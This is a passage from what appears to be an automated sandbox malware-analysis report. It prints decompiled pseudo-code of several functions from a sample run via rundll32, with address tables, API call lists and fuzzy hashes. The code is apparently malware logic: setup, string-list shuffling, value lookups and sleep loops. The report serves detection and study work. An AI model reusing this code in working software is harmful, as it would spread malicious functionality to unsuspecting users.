				void* __edi;
				void* __esi;
				void* _t21;
				CHAR* _t22;
				CHAR* _t25;
				intOrPtr _t26;
				void* _t27;
				void* _t31;
				void* _t32;
				CHAR* _t36;
				CHAR* _t42;
				CHAR* _t43;
				CHAR* _t44;
				void* _t49;
				void* _t51;
				signed char _t56;
				intOrPtr _t58;
				signed int _t59;
				void* _t63;
				CHAR* _t67;
				CHAR* _t68;
				char* _t69;
				void* _t70;

				_t61 = __edx;
				_v20 = 0;
				_v8 = 0;
				_v12 = 0;
				_t21 = E04214843();
				if(_t21 != 0) {
					_t59 =  *0x421a2fc; // 0x4000000a
					_t55 = (_t59 & 0xf0000000) + _t21;
					 *0x421a2fc = (_t59 & 0xf0000000) + _t21;
				}
				_t22 =  *0x421a178(0, 2); // executed
				_v16 = _t22;
				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
					_t25 = E04211649( &_v8,  &_v20); // executed
					_t54 = _t25;
					_t26 =  *0x421a320; // 0x87d5a8
					if( *0x421a2fc > 5) {
						_t8 = _t26 + 0x421b5cd; // 0x4d283a53
						_t27 = _t8;
					} else {
						_t7 = _t26 + 0x421b9f5; // 0x44283a44
						_t27 = _t7;
					}
					E04215A2D(_t27, _t27);
					_t31 = E0421414A(_t61,  &_v20,  &_v12); // executed
					if(_t31 == 0) {
						CloseHandle(_v20);
					}
					_t63 = 5;
					if(_t54 != _t63) {
						 *0x421a310 =  *0x421a310 ^ 0x81bbe65d;
						_t32 = E042163FD(0x60);
						__eflags = _t32;
						 *0x421a3cc = _t32;
						if(_t32 == 0) {
							_push(8);
							_pop(0);
						} else {
							memset(_t32, 0, 0x60);
							_t49 =  *0x421a3cc; // 0x4a995b0
							_t70 = _t70 + 0xc;
							__imp__(_t49 + 0x40);
							_t51 =  *0x421a3cc; // 0x4a995b0
							 *_t51 = 0x421b81a;
						}
						__eflags = 0;
						_t54 = 0;
						if(0 == 0) {
							_t36 = RtlAllocateHeap( *0x421a2d8, 0, 0x43);
							__eflags = _t36;
							 *0x421a364 = _t36;
							if(_t36 == 0) {
								_push(8);
								_pop(0);
							} else {
								_t56 =  *0x421a2fc; // 0x4000000a
								_t61 = _t56 & 0x000000ff;
								_t58 =  *0x421a320; // 0x87d5a8
								_t13 = _t58 + 0x421b55a; // 0x697a6f4d
								_t55 = _t13;
								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4219287);
							}
							__eflags = 0;
							_t54 = 0;
							if(0 == 0) {
								asm("sbb eax, eax");
								E042121BC( ~_v8 &  *0x421a310, 0x421a00c); // executed
								_t42 = E04214EF3(0, _t55, _t63, 0x421a00c); // executed
								_t54 = _t42;
								__eflags = _t54;
								if(_t54 != 0) {
									goto L30;
								}
								_t43 = E04213C10(); // executed
								__eflags = _t43;
								if(_t43 != 0) {
									__eflags = _v8;
									_t67 = _v12;
									if(_v8 != 0) {
										L29:
										_t44 = E04215458(_t61, _t67, _v8); // executed
										_t54 = _t44;
										goto L30;
									}
									__eflags = _t67;
									if(__eflags == 0) {
										goto L30;
									}
									_t54 = E04217576(__eflags,  &(_t67[4]));
									__eflags = _t54;
									if(_t54 == 0) {
										goto L30;
									}
									goto L29;
								}
								_t54 = 8;
							}
						}
					} else {
						_t68 = _v12;
						if(_t68 == 0) {
							L30:
							if(_v16 == 0 || _v16 == 1) {
								 *0x421a17c();
							}
							goto L34;
						}
						_t69 =  &(_t68[4]);
						do {
						} while (E042178DB(_t63, _t69, 0, 1) == 0x4c7);
					}
					goto L30;
				} else {
					_t54 = _t22;
					L34:
					return _t54;
				}
			}































                    0x04216535
                    0x0421653f
                    0x04216542
                    0x04216545
                    0x04216548
                    0x0421654f
                    0x04216551
                    0x0421655d
                    0x0421655f
                    0x0421655f
                    0x04216568
                    0x04216570
                    0x04216573
                    0x0421658d
                    0x04216599
                    0x0421659b
                    0x042165a0
                    0x042165aa
                    0x042165aa
                    0x042165a2
                    0x042165a2
                    0x042165a2
                    0x042165a2
                    0x042165b1
                    0x042165be
                    0x042165c5
                    0x042165ca
                    0x042165ca
                    0x042165d3
                    0x042165d6
                    0x042165fc
                    0x04216608
                    0x0421660d
                    0x0421660f
                    0x04216614
                    0x04216640
                    0x04216642
                    0x04216616
                    0x0421661a
                    0x0421661f
                    0x04216624
                    0x0421662b
                    0x04216631
                    0x04216636
                    0x0421663c
                    0x04216643
                    0x04216645
                    0x04216647
                    0x04216656
                    0x0421665c
                    0x0421665e
                    0x04216663
                    0x04216693
                    0x04216695
                    0x04216665
                    0x04216665
                    0x0421666b
                    0x04216678
                    0x0421667e
                    0x0421667e
                    0x04216686
                    0x0421668f
                    0x04216696
                    0x04216698
                    0x0421669a
                    0x042166a1
                    0x042166ae
                    0x042166b3
                    0x042166b8
                    0x042166ba
                    0x042166bc
                    0x00000000
                    0x00000000
                    0x042166be
                    0x042166c3
                    0x042166c5
                    0x042166cc
                    0x042166d0
                    0x042166d3
                    0x042166e8
                    0x042166ec
                    0x042166f1
                    0x00000000
                    0x042166f1
                    0x042166d5
                    0x042166d7
                    0x00000000
                    0x00000000
                    0x042166e2
                    0x042166e4
                    0x042166e6
                    0x00000000
                    0x00000000
                    0x00000000
                    0x042166e6
                    0x042166c9
                    0x042166c9
                    0x0421669a
                    0x042165d8
                    0x042165d8
                    0x042165dd
                    0x042166f3
                    0x042166f8
                    0x04216700
                    0x04216700
                    0x00000000
                    0x042166f8
                    0x042165e3
                    0x042165e6
                    0x042165f0
                    0x042165f7
                    0x00000000
                    0x04216708
                    0x04216708
                    0x0421670b
                    0x0421670f
                    0x0421670f

                    APIs
                      • Part of subcall function 04214843: GetModuleHandleA.KERNEL32(4C44544E,00000000,0421654D,00000001), ref: 04214852
                    • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 042165CA
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • memset.NTDLL ref: 0421661A
                    • RtlInitializeCriticalSection.NTDLL(04A99570), ref: 0421662B
                      • Part of subcall function 04217576: memset.NTDLL ref: 04217590
                      • Part of subcall function 04217576: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 042175D6
                      • Part of subcall function 04217576: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 042175E1
                    • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04216656
                    • wsprintfA.USER32 ref: 04216686
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                    • String ID:
                    • API String ID: 4246211962-0
                    • Opcode ID: e38d91f9329b12ba5852ef9df733bd5c69781e808b5dd5e777dca712fa47b08a
                    • Instruction ID: 85aa34b7e4289ab9e1aec22d87ab8cf3a7d9e90adf2b6c8aff04aedbd699e063
                    • Opcode Fuzzy Hash: e38d91f9329b12ba5852ef9df733bd5c69781e808b5dd5e777dca712fa47b08a
                    • Instruction Fuzzy Hash: EC51B371B21216AFEB109FA8E848B6E77E8EB34744F104466E501E7170EAB9B944CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042137CE Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 145stringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 22%
                    			E042137CE(signed int __eax, signed int _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				intOrPtr _v16;
				signed int _v20;
				intOrPtr _t81;
				char _t83;
				signed int _t90;
				signed int _t97;
				signed int _t99;
				char _t101;
				unsigned int _t102;
				intOrPtr _t103;
				char* _t107;
				signed int _t110;
				signed int _t113;
				signed int _t118;
				signed int _t122;
				intOrPtr _t124;

				_t102 = _a8;
				_t118 = 0;
				_v20 = __eax;
				_t122 = (_t102 >> 2) + 1;
				_v8 = 0;
				_a8 = 0;
				_t81 = E042163FD(_t122 << 2);
				_v16 = _t81;
				if(_t81 == 0) {
					_push(8);
					_pop(0);
					L37:
					return 0;
				}
				_t107 = _a4;
				_a4 = _t102;
				_t113 = 0;
				while(1) {
					_t83 =  *_t107;
					if(_t83 == 0) {
						break;
					}
					if(_t83 == 0xd || _t83 == 0xa) {
						if(_t118 != 0) {
							if(_t118 > _v8) {
								_v8 = _t118;
							}
							_a8 = _a8 + 1;
							_t118 = 0;
						}
						 *_t107 = 0;
						goto L16;
					} else {
						if(_t118 != 0) {
							L10:
							_t118 = _t118 + 1;
							L16:
							_t107 = _t107 + 1;
							_t15 =  &_a4;
							 *_t15 = _a4 - 1;
							if( *_t15 != 0) {
								continue;
							}
							break;
						}
						if(_t113 == _t122) {
							L21:
							if(_a8 <= 0x20) {
								_push(0xb);
								L34:
								_pop(0);
								L35:
								E042117AB(_v16);
								goto L37;
							}
							_t24 = _v8 + 5; // 0xcdd8d2f8
							_t103 = E042163FD((_v8 + _t24) * _a8 + 4);
							if(_t103 == 0) {
								_push(8);
								goto L34;
							}
							_t90 = _a8;
							_a4 = _a4 & 0x00000000;
							_v8 = _v8 & 0x00000000;
							_t124 = _t103 + _t90 * 4;
							if(_t90 <= 0) {
								L31:
								 *0x421a318 = _t103;
								goto L35;
							}
							do {
								_t110 = 0x3c6ef35f + _v20 * 0x19660d;
								_v20 = 0x3c6ef35f + _t110 * 0x19660d;
								__imp__(_t124,  *((intOrPtr*)(_v16 + _t110 % _a8 * 4)));
								__imp__(_t124,  *((intOrPtr*)(_v16 + _v20 % _a8 * 4)));
								_v12 = _v12 & 0x00000000;
								if(_a4 <= 0) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t99 = _v12;
									__imp__( *((intOrPtr*)(_t103 + _t99 * 4)), _t124); // executed
									if(_t99 == 0) {
										break;
									}
									_v12 = _v12 + 1;
									if(_v12 < _a4) {
										continue;
									}
									goto L30;
								}
								_v8 = _v8 - 1;
								L30:
								_t97 = _a4;
								_a4 = _a4 + 1;
								 *((intOrPtr*)(_t103 + _t97 * 4)) = _t124;
								__imp__(_t124);
								_v8 = _v8 + 1;
								_t124 = _t124 + _t97 + 1;
							} while (_v8 < _a8);
							goto L31;
						}
						 *((intOrPtr*)(_v16 + _t113 * 4)) = _t107;
						_t101 = _t83;
						if(_t83 - 0x61 <= 0x19) {
							_t101 = _t101 - 0x20;
						}
						 *_t107 = _t101;
						_t113 = _t113 + 1;
						goto L10;
					}
				}
				if(_t118 != 0) {
					if(_t118 > _v8) {
						_v8 = _t118;
					}
					_a8 = _a8 + 1;
				}
				goto L21;
			}





















                    0x042137d5
                    0x042137dc
                    0x042137e1
                    0x042137e4
                    0x042137eb
                    0x042137ee
                    0x042137f1
                    0x042137f8
                    0x042137fb
                    0x0421394f
                    0x04213951
                    0x04213953
                    0x04213958
                    0x04213958
                    0x04213801
                    0x04213804
                    0x04213807
                    0x04213809
                    0x04213809
                    0x0421380d
                    0x00000000
                    0x00000000
                    0x04213811
                    0x0421383d
                    0x04213842
                    0x04213844
                    0x04213844
                    0x04213847
                    0x0421384a
                    0x0421384a
                    0x0421384c
                    0x00000000
                    0x04213817
                    0x04213819
                    0x04213838
                    0x04213838
                    0x0421384f
                    0x0421384f
                    0x04213850
                    0x04213850
                    0x04213853
                    0x00000000
                    0x00000000
                    0x00000000
                    0x04213853
                    0x0421381d
                    0x04213864
                    0x04213868
                    0x04213942
                    0x04213944
                    0x04213944
                    0x04213945
                    0x04213948
                    0x00000000
                    0x04213948
                    0x04213871
                    0x04213882
                    0x04213886
                    0x0421393e
                    0x00000000
                    0x0421393e
                    0x0421388c
                    0x0421388f
                    0x04213893
                    0x04213899
                    0x0421389c
                    0x04213934
                    0x04213934
                    0x00000000
                    0x0421393a
                    0x042138a7
                    0x042138b0
                    0x042138c4
                    0x042138cb
                    0x042138e0
                    0x042138e6
                    0x042138ee
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000
                    0x042138f0
                    0x042138f0
                    0x042138f0
                    0x042138f7
                    0x042138ff
                    0x00000000
                    0x00000000
                    0x04213901
                    0x0421390a
                    0x00000000
                    0x00000000
                    0x00000000
                    0x0421390c
                    0x0421390e
                    0x04213911
                    0x04213911
                    0x04213914
                    0x04213918
                    0x0421391b
                    0x04213921
                    0x04213924
                    0x0421392b
                    0x00000000
                    0x042138a7
                    0x04213822
                    0x0421382d
                    0x04213830
                    0x04213832
                    0x04213832
                    0x04213835
                    0x04213837
                    0x00000000
                    0x04213837
                    0x04213811
                    0x04213857
                    0x0421385c
                    0x0421385e
                    0x0421385e
                    0x04213861
                    0x04213861
                    0x00000000

                    APIs
                      • Part of subcall function 042163FD: RtlAllocateHeap.NTDLL(00000000,00000000,042128D5), ref: 04216409
                    • lstrcpy.KERNEL32(69B25F45,00000020), ref: 042138CB
                    • lstrcat.KERNEL32(69B25F45,00000020), ref: 042138E0
                    • lstrcmp.KERNEL32(00000000,69B25F45), ref: 042138F7
                    • lstrlen.KERNEL32(69B25F45), ref: 0421391B
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: AllocateHeaplstrcatlstrcmplstrcpylstrlen
                    • String ID:
                    • API String ID: 3214092121-3916222277
                    • Opcode ID: b35b3d4a55ae9c5e1b100840f3f3bea85a6ec566d6b972570642e5667cd0a54b
                    • Instruction ID: 486de237412c67d20a4d7befe3acdd115d89b5911362631300f53d4536c842dd
                    • Opcode Fuzzy Hash: b35b3d4a55ae9c5e1b100840f3f3bea85a6ec566d6b972570642e5667cd0a54b
                    • Instruction Fuzzy Hash: 4851AC71B10209EFEF21CF99C4846ADBBF6FF65314F05805AEC59AB221C770AA51CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04213399 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 94memoryCOMMON
                    Download Yara Rule
                    C-Code - Quality: 100%
                    			E04213399(void* __edx) {
				void* _v8;
				int _v12;
				WCHAR* _v16;
				void* __edi;
				void* __esi;
				void* _t23;
				intOrPtr _t24;
				void* _t26;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t38;
				void* _t40;
				intOrPtr _t42;
				void* _t45;
				void* _t50;
				void* _t52;

				_t50 = __edx;
				_v12 = 0;
				_t23 = E042140C7(0,  &_v8); // executed
				if(_t23 != 0) {
					_v8 = 0;
				}
				_t24 =  *0x421a320; // 0x87d5a8
				_t4 = _t24 + 0x421be30; // 0x4a993d8
				_t5 = _t24 + 0x421bdd8; // 0x4f0053
				_t26 = E04212985( &_v16, _v8, _t5, _t4); // executed
				_t45 = _t26;
				if(_t45 == 0) {
					StrToIntExW(_v16, 0,  &_v12);
					_t45 = 8;
					if(_v12 < _t45) {
						_t45 = 1;
						__eflags = 1;
					} else {
						_t32 =  *0x421a320; // 0x87d5a8
						_t11 = _t32 + 0x421be24; // 0x4a993cc
						_t48 = _t11;
						_t12 = _t32 + 0x421bdd8; // 0x4f0053
						_t52 = E0421114D(_t11, _t12, _t11);
						_t59 = _t52;
						if(_t52 != 0) {
							_t35 =  *0x421a320; // 0x87d5a8
							_t13 = _t35 + 0x421be6e; // 0x30314549
							if(E04215231(_t48, _t50, _t59, _v8, _t52, _t13, 0x14) == 0) {
								_t61 =  *0x421a2fc - 6;
								if( *0x421a2fc <= 6) {
									_t42 =  *0x421a320; // 0x87d5a8
									_t15 = _t42 + 0x421bdba; // 0x52384549
									E04215231(_t48, _t50, _t61, _v8, _t52, _t15, 0x13);
								}
							}
							_t38 =  *0x421a320; // 0x87d5a8
							_t17 = _t38 + 0x421be68; // 0x4a99410
							_t18 = _t38 + 0x421be40; // 0x680043
							_t40 = E042134EE(_v8, 0x80000001, _t52, _t18, _t17); // executed
							_t45 = _t40;
							HeapFree( *0x421a2d8, 0, _t52);
						}
					}
					HeapFree( *0x421a2d8, 0, _v16);
				}
				_t54 = _v8;
				if(_v8 != 0) {
					E04214B59(_t54);
				}
				return _t45;
			}



















                    0x04213399
                    0x042133a9
                    0x042133ac
                    0x042133b3
                    0x042133b5
                    0x042133b5
                    0x042133b8
                    0x042133bd
                    0x042133c4
                    0x042133d1
                    0x042133d6
                    0x042133da
                    0x042133e8
                    0x042133f6
                    0x042133fa
                    0x0421348b
                    0x0421348b
                    0x04213400
                    0x04213400
                    0x04213405
                    0x04213405
                    0x0421340c
                    0x04213418
                    0x0421341a
                    0x0421341c
                    0x0421341e
                    0x04213425
                    0x04213437
                    0x04213439
                    0x04213440
                    0x04213442
                    0x04213449
                    0x04213454
                    0x04213454
                    0x04213440
                    0x04213459
                    0x0421345e
                    0x04213465
                    0x04213475
                    0x04213483
                    0x04213485
                    0x04213485
                    0x0421341c
                    0x04213497
                    0x04213497
                    0x04213499
                    0x0421349e
                    0x042134a0
                    0x042134a0
                    0x042134ab

                    APIs
                    • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,04A993D8,00000000,?,74E5F710,00000000,74E5F730), ref: 042133E8
                    • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,04A99410,?,00000000,30314549,00000014,004F0053,04A993CC), ref: 04213485
                    • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,042154F9), ref: 04213497
                    Strings
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: FreeHeap
                    • String ID: Ut
                    • API String ID: 3298025750-8415677
                    • Opcode ID: 9a11d9407899306e4748e71a272d9772625bebf1dead96f9ebde39a21149fd90
                    • Instruction ID: 1e2c2ed15e04fe5acd3e442333f337082b5191b2a74e05800420ba961fbbce0b
                    • Opcode Fuzzy Hash: 9a11d9407899306e4748e71a272d9772625bebf1dead96f9ebde39a21149fd90
                    • Instruction Fuzzy Hash: 01318431B10149BFEB12DBD4EC84E9ABBF9EB29754F5400A6E504A7071DA71AE04D750
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042114E4 Relevance: 6.1, APIs: 4, Instructions: 98memoryCOMMON
                    Download Yara Rule
                    APIs
                    • SysAllocString.OLEAUT32(80000002), ref: 0421153B
                    • SysAllocString.OLEAUT32(04212BCC), ref: 0421157E
                    • SysFreeString.OLEAUT32(00000000), ref: 04211592
                    • SysFreeString.OLEAUT32(00000000), ref: 042115A0
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: String$AllocFree
                    • String ID:
                    • API String ID: 344208780-0
                    • Opcode ID: ca1e2b3ef8a8a5fc9c82f07acbd97d77c6645cb46ea228308ff515dd48dc0d59
                    • Instruction ID: 4a83b9150b516b5b7c8855713e97ca950b08317afee1e1085b412c3d1e156503
                    • Opcode Fuzzy Hash: ca1e2b3ef8a8a5fc9c82f07acbd97d77c6645cb46ea228308ff515dd48dc0d59
                    • Instruction Fuzzy Hash: B331DD71A10109FF8B05DF98D4848AEBBF5FF6C380B10442EF50797260E775AA55CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 042157A8 Relevance: 6.1, APIs: 4, Instructions: 76sleepstringCOMMON
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E042157A8(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
				intOrPtr _v8;
				void* _v12;
				void* _v16;
				intOrPtr _t26;
				intOrPtr* _t28;
				intOrPtr _t31;
				intOrPtr* _t32;
				void* _t39;
				int _t46;
				intOrPtr* _t47;
				int _t48;

				_t47 = __eax;
				_push( &_v12);
				_push(__eax);
				_t39 = 0;
				_t46 = 0; // executed
				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
				_v8 = _t26;
				if(_t26 < 0) {
					L13:
					return _v8;
				}
				if(_v12 == 0) {
					Sleep(0xc8);
					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
				}
				if(_v8 >= _t39) {
					_t28 = _v12;
					if(_t28 != 0) {
						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
						_v8 = _t31;
						if(_t31 >= 0) {
							_t46 = lstrlenW(_v16);
							if(_t46 != 0) {
								_t46 = _t46 + 1;
								_t48 = _t46 + _t46;
								_t39 = E042163FD(_t48);
								if(_t39 == 0) {
									_v8 = 0x8007000e;
								} else {
									memcpy(_t39, _v16, _t48);
								}
								__imp__#6(_v16);
							}
						}
						_t32 = _v12;
						 *((intOrPtr*)( *_t32 + 8))(_t32);
					}
					 *_a4 = _t39;
					 *_a8 = _t46 + _t46;
				}
				goto L13;
			}














                    0x042157b4
                    0x042157b8
                    0x042157b9
                    0x042157ba
                    0x042157bc
                    0x042157be
                    0x042157c3
                    0x042157c6
                    0x0421585d
                    0x04215864
                    0x04215864
                    0x042157cf
                    0x042157d6
                    0x042157e6
                    0x042157e6
                    0x042157ec
                    0x042157ee
                    0x042157f3
                    0x042157fc
                    0x04215804
                    0x04215807
                    0x04215812
                    0x04215816
                    0x04215818
                    0x04215819
                    0x04215822
                    0x04215826
                    0x04215837
                    0x04215828
                    0x0421582d
                    0x04215832
                    0x04215841
                    0x04215841
                    0x04215816
                    0x04215847
                    0x0421584d
                    0x0421584d
                    0x04215856
                    0x0421585b
                    0x0421585b
                    0x00000000

                    APIs
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: FreeSleepStringlstrlenmemcpy
                    • String ID:
                    • API String ID: 1198164300-0
                    • Opcode ID: c2cffa2a6d6813fb994dfd82faa101c4486dcf93f0c37c04d46696fa9c4158e1
                    • Instruction ID: eb19dbe6d08f905e05dc10d6cdb5efa66a783ee8d724c557174d53cb92ee7fee
                    • Opcode Fuzzy Hash: c2cffa2a6d6813fb994dfd82faa101c4486dcf93f0c37c04d46696fa9c4158e1
                    • Instruction Fuzzy Hash: 25215175A10209FFCB11DFA8D88899EBBF4FF98300B1145A9E815D7220E730EA81CB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04212A4C Relevance: 6.0, APIs: 4, Instructions: 44sleepthreadtimeCOMMON
                    Download Yara Rule
                    C-Code - Quality: 65%
                    			E04212A4C(void* __ecx, intOrPtr _a4) {
				struct _FILETIME _v12;
				int _t13;
				signed int _t16;
				void* _t18;
				signed int _t19;
				unsigned int _t23;
				void* _t30;
				signed int _t34;

				_v12.dwLowDateTime = _v12.dwLowDateTime & 0x00000000;
				asm("stosd");
				do {
					_t13 = SwitchToThread();
					GetSystemTimeAsFileTime( &_v12);
					_t23 = _v12.dwHighDateTime;
					_t16 = (_t23 << 0x00000020 | _v12.dwLowDateTime) >> 5;
					_push(0);
					_push(0x13);
					_push(_t23 >> 5);
					_push(_t16);
					L042182E6();
					_t34 = _t16 + _t13;
					_t18 = E04212888(_a4, _t34);
					_t30 = _t18;
					_t19 = 3;
					Sleep(_t19 << (_t34 & 0x00000007)); // executed
				} while (_t30 == 1);
				return _t30;
			}











                    0x04212a51
                    0x04212a5c
                    0x04212a5d
                    0x04212a5d
                    0x04212a69
                    0x04212a72
                    0x04212a75
                    0x04212a79
                    0x04212a7b
                    0x04212a80
                    0x04212a81
                    0x04212a82
                    0x04212a8c
                    0x04212a8f
                    0x04212a96
                    0x04212a9a
                    0x04212aa1
                    0x04212aa7
                    0x04212ab1

                    APIs
                    • SwitchToThread.KERNEL32(?,00000001,?,?,?,04214610,?,?), ref: 04212A5D
                    • GetSystemTimeAsFileTime.KERNEL32(00000000,?,00000001,?,?,?,04214610,?,?), ref: 04212A69
                    • _aullrem.NTDLL(00000000,?,00000013,00000000), ref: 04212A82
                      • Part of subcall function 04212888: memcpy.NTDLL(00000000,00000000,?,?,00000000,?,?,?,00000000), ref: 042128E7
                    • Sleep.KERNEL32(00000003,00000000,?,00000001,?,?,?,04214610,?,?), ref: 04212AA1
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
                    • Associated: 00000006.00000002.811440190.0000000004210000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811472949.0000000004219000.00000002.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811484936.000000000421A000.00000004.00020000.sdmpDownload File
                    • Associated: 00000006.00000002.811499542.000000000421C000.00000002.00020000.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_6_2_4210000_rundll32.jbxd
                    Similarity
                    • API ID: Time$FileSleepSwitchSystemThread_aullremmemcpy
                    • String ID:
                    • API String ID: 1610602887-0
                    • Opcode ID: 9b0212c9c4d77db581864407ad1babf86a49b460f4e2d1af84c6f052aa6dee26
                    • Instruction ID: 31d7eb9156dba9b92ba7d8d465429413baf7c5456c50e1fd4ebe7604918c20de
                    • Opcode Fuzzy Hash: 9b0212c9c4d77db581864407ad1babf86a49b460f4e2d1af84c6f052aa6dee26
                    • Instruction Fuzzy Hash: 52F0A4B3B50104BBD7149AA8DC5DBAF76F9DB94355F110164F601E7240E978AA40C6A4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 04213B61 Relevance: 4.6, APIs: 3, Instructions: 58COMMON
                    Download Yara Rule
                    C-Code - Quality: 47%
                    			E04213B61(char* _a4, char** _a8) {
				char* _t7;
				char* _t11;
				char* _t14;
				char* _t16;
				char* _t17;
				char _t18;
				signed int _t20;
				signed int _t22;

				_t16 = _a4;
				_push(0x20);
				_t20 = 1;
				_push(_t16);
				while(1) {
					_t7 = StrChrA();
					if(_t7 == 0) {
						break;
					}
					_t20 = _t20 + 1;
					_push(0x20);
					_push( &(_t7[1]));
				}
				_t11 = E042163FD(_t20 << 2);
				_a4 = _t11;
				if(_t11 != 0) {
					StrTrimA(_t16, 0x4219284); // executed
					_t22 = 0;
					do {
						_t14 = StrChrA(_t16, 0x20);
						if(_t14 != 0) {
							 *_t14 = 0;
							do {
								_t14 =  &(_t14[1]);
								_t18 =  *_t14;
							} while (_t18 == 0x20 || _t18 == 9);
						}
						_t17 = _a4;
						 *(_t17 + _t22 * 4) = _t16;
						_t22 = _t22 + 1;
						_t16 = _t14;
					} while (_t14 != 0);
					 *_a8 = _t17;
				}
				return 0;
			}











                    0x04213b65
                    0x04213b72
                    0x04213b74
                    0x04213b75
                    0x04213b7d
                    0x04213b7d
                    0x04213b81
                    0x00000000
                    0x00000000
                    0x04213b78
                    0x04213b79
                    0x04213b7c
                    0x04213b7c
                    0x04213b89
                    0x04213b90
                    0x04213b93
                    0x04213b9b
                    0x04213ba1
                    0x04213ba3
                    0x04213ba6
                    0x04213baa
                    0x04213bac
                    0x04213baf
                    0x04213baf
                    0x04213bb0
                    0x04213bb2
                    0x04213baf
                    0x04213bbc
                    0x04213bbf
                    0x04213bc2
                    0x04213bc5
                    0x04213bc5
                    0x04213bcc
                    0x04213bcc
                    0x04213bd8

                    APIs
                    • StrChrA.SHLWAPI(?,00000020,00000000,04A995AC,?,?,0421104B,?,04A995AC), ref: 04213B7D
                    • StrTrimA.SHLWAPI(?,04219284,00000002,?,0421104B,?,04A995AC), ref: 04213B9B
                    • StrChrA.SHLWAPI(?,00000020,?,0421104B,?,04A995AC), ref: 04213BA6
                    Memory Dump Source
                    • Source File: 00000006.00000002.811456478.0000000004211000.00000020.00020000.sdmp, Offset: 04210000, based on PE: true
